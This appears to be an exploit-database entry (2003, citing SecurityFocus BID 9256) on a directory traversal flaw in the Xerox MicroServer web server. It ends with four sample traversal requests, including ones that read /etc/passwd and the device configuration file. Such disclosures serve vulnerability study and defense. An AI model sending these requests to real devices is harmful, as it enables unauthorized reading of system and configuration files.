Xerox MicroServer - Web Server Directory Traversal

Author: J.A. Gutierrez
type: remote
platform: unix
port: 
date_added: 2003-12-19  
date_updated: 2012-12-17  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 23449.txt  
source: https://www.securityfocus.com/bid/9256/info

It has been reported that Xerox_MicroServer/Xerox11 may be prone to a directory traversal vulnerability that may allow an attacker to traverse outside the server root directory by using '/..' or '/.' character sequences at the end of a URL request.

GET /assist/..
GET /assist/////.././../../.
http://www.example.com////../../data/config/microsrv.cfg
http://www.example.com////////../../../../../../etc/passwd